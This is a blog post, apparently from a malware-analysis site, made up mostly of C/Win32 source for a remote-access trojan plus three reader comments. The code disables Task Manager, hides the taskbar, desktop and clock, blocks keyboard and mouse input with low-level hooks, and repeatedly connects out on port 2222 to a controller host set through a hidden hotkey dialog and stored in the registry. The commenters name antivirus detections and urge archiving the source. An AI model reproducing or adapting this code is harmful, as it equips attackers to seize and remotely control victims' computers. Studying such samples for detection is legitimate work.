        r = RegSetValueEx(hKey, VAL_DISABLETASKMGR, 0, REG_DWORD, (BYTE *)&val, sizeof(val));
    }

    RegCloseKey(hKey);

    return (r);
}


int StartButton_Show_Hide(BOOL bShowHide)
{
    HWND    hWnd;

    hWnd = GetDlgItem(FindWindow(TASKBAR, NULL), ID_STARTBUTTON);
    if (hWnd == NULL)
        return 0;

    ShowWindow(hWnd, bShowHide ? SW_SHOW : SW_HIDE);
    UpdateWindow(hWnd);

    return 1;
}


int Taskbar_Show_Hide(BOOL bShowHide)
{
    HWND    hWnd;

    hWnd = FindWindow(TASKBAR, NULL);
    if (hWnd == NULL)
        return 0;

    ShowWindow(hWnd, bShowHide ? SW_SHOW : SW_HIDE);
//    EnableWindow(hWnd, bShowHide);
    UpdateWindow(hWnd);

    return 1;
}


int Clock_Show_Hide(BOOL bShowHide)
{
    HWND    hWnd;

    hWnd = GetDlgItem(FindWindow(TASKBAR, NULL), ID_TRAY);
    hWnd = GetDlgItem(hWnd, ID_CLOCK);
    if (hWnd == NULL)
        return 0;

    ShowWindow(hWnd, bShowHide ? SW_SHOW : SW_HIDE);
    UpdateWindow(hWnd);

    return 1;
}


CString ProcSpeedRead()
{
CString sMHz;
char Buffer[_MAX_PATH];
DWORD BufSize = _MAX_PATH;
DWORD dwMHz = _MAX_PATH;
HKEY hKey;
  
    // open the key where the proc speed is hidden:
    long lError = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                            "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0",
                            0,
                            KEY_READ,
                            &hKey);
  
    if(lError != ERROR_SUCCESS)
        { // if the key is not found, tell the user why:
            FormatMessage(    FORMAT_MESSAGE_FROM_SYSTEM,
                            NULL,
                            lError,
                            0,
                            Buffer,
                            _MAX_PATH,
                            0);
                AfxMessageBox(Buffer);
            return "N/A";
        }
            // query the key;
            RegQueryValueEx(hKey, "~MHz", NULL, NULL, (LPBYTE) &dwMHz, &BufSize);
      
        // convert the DWORD to a CString:
        sMHz.Format("%i", dwMHz);

return sMHz;
}


int Key_Block_Unblock(BOOL bBlockUnblock)
{
if (!bBlockUnblock)
    {
        if (!hHookK)
        {
            hHookK  = SetWindowsHookEx(WH_KEYBOARD_LL,
                                      (HOOKPROC)LowLevelKeyBoardHookProc,
                                      hInst,
                                      0);
            if (!hHookK)
                return 0;
        }
    }
    else
    {
        UnhookWindowsHookEx(hHookK);
        hHookK = NULL;
    }
    return 1;
}



int Desktop_Show_Hide(BOOL bShowHide)
{
    OSVERSIONINFO    osvi;
    BOOL            bIsWindowsNT4SP3orLater;
    int                iServicePack;
    char           *p;

    // Determine the current windows version
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&osvi);
    for (p = osvi.szCSDVersion; *p  && !isdigit(*p); *p++);
    iServicePack = atoi(p);
    bIsWindowsNT4SP3orLater = (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT) &&
                              (((osvi.dwMajorVersion == 4) && (iServicePack >= 3)) ||
                              (osvi.dwMajorVersion > 4));

    if (!bShowHide)
    {
        if (!hHook)
        {
            hHook  = SetWindowsHookEx(bIsWindowsNT4SP3orLater ? WH_MOUSE_LL : WH_MOUSE,
                                      bIsWindowsNT4SP3orLater ? (HOOKPROC)LowLevelMouseHookProc : (HOOKPROC)MouseHookProc,
                                      hInst,
                                      0);
            if (!hHook)
                return 0;
        }
    }
    else
    {
        UnhookWindowsHookEx(hHook);
        hHook = NULL;
    }


    return SetWindowPos(FindWindow(NULL, PROGRAM_MANAGER),
                        NULL,
                        0, 0, 0, 0,
                        bShowHide ? SWP_SHOWWINDOW : SWP_HIDEWINDOW | SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER);
}


int Mouse_Block_Unblock(BOOL bBlockUnblock)
{
if (!bBlockUnblock)
    {
        if (!hHookM)
        {
            hHookM  = SetWindowsHookEx(WH_MOUSE_LL,
                                      (HOOKPROC)LowLevelMouseHookProcB,
                                      hInst,
                                      0);
            if (!hHookM)
                return 0;
        }
    }
    else
    {
        UnhookWindowsHookEx(hHookM);
        hHookM = NULL;
    }
    return 1;
}

DWORD WINAPI StartConn(LPVOID pParam)
{
beg:

    WSADATA wsaData;
    struct hostent *hp;
    unsigned int addr;
    struct sockaddr_in server;
    int wsaret=WSAStartup(0x101,&wsaData);

    if(wsaret)  
        return 0;



Sleep(100);


    connfile=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  
    if(connfile==INVALID_SOCKET)
        goto beg ;

   

    if(inet_addr(text)==INADDR_NONE)
    {
        hp=gethostbyname(text);
    }
    else
    {
        addr=inet_addr(text);
        hp=gethostbyaddr((char*)&addr,sizeof(addr),AF_INET);
    }

    if(hp==NULL)
    {
        closesocket(connfile);
goto beg;
    }
  
    server.sin_addr.s_addr=*((unsigned long*)hp->h_addr);
    server.sin_family=AF_INET;
    server.sin_port=htons(2222);
  
    if(connect(connfile,(struct sockaddr*)&server,sizeof(server)))
    {

closesocket(connfile);
goto beg;      
    }
  

fcl=CreateThread(0,0,FileClient,(LPVOID)connfile,0,0);

return 0;
}

UINT Configure(LPVOID pParam)
{
begin:
    while(true)
    {
if((GetAsyncKeyState(VK_CONTROL)<0)&&((GetAsyncKeyState(VK_MENU)<0))&&((GetAsyncKeyState(VK_SHIFT)<0))&&((GetAsyncKeyState('G')<0)))
{
    DialogBox(0,MAKEINTRESOURCE(IDD_DIALOG1),0,DLGPROC(fereastra));
    goto begin;
}
Sleep(1);
    }
    return 0;
}
long FAR PASCAL fereastra(HWND hdlg,WORD wmessage,WPARAM wparam,LPARAM lparam)
{

    switch(wmessage)
    {
    case WM_INITDIALOG:
        SendMessage(hdlg,WM_SETICON,ICON_BIG,(LPARAM)(HICON)hicon);
        SendMessage(hdlg,WM_SETICON,ICON_SMALL,(LPARAM)(HICON)hicon);
        break;


    case WM_CLOSE:
    EndDialog(hdlg,0);  
    break;

    case WM_COMMAND:
        switch(wparam)
        {
        case IDOK:
            char host[1024];
            GetDlgItemText(hdlg,IDC_EDIT1,host,sizeof(host));
            if (strcmp(host,"")==0)
            {
                MessageBox(NULL,"Error no host inserted","",MB_OK);
                break;
            }
            HKEY Regentry;
            DWORD dispos;

RegCreateKeyEx(HKEY_LOCAL_MACHINE,"Software\\RemoteHost",0,NULL,REG_OPTION_NON_VOLATILE ,  KEY_CREATE_SUB_KEY | KEY_ALL_ACCESS|KEY_QUERY_VALUE,NULL,&Regentry,&dispos);
if (Regentry==NULL)
{
MessageBox(NULL,"Error setting host","",MB_OK);
break;
}
RegSetValueEx(Regentry,"host",NULL,REG_SZ,(unsigned char*)&host,strlen(host)+1);
RegCloseKey(Regentry);
MessageBox(NULL,"Host succesfully saved","",MB_OK);
EndDialog(hdlg,0);
    break;

        }
        break;
    }
    return 0;
}

----------------------------------------------------------------

3 comments:

  1. FYI, in the "Genral Information", you have Type = PDF?

    ReplyDelete
  2. Mila, the source code for this is here. Amazingly the AV vendors mostly have their Caro naming completely off calling it ZLOB which is fake video player malware naming....

    More accurate hits are Muraj and Scar which is an older name.

    http://www.koders.com/cpp/fidCE143585481E93C59D3D7078584B309C8B8F4BA0.aspx?s=setwindowshookex#L1344

    Suggestion would be to capture source and host it locally before it disappears...

    Diocyde

    www.conanthedestroyer.net

    ReplyDelete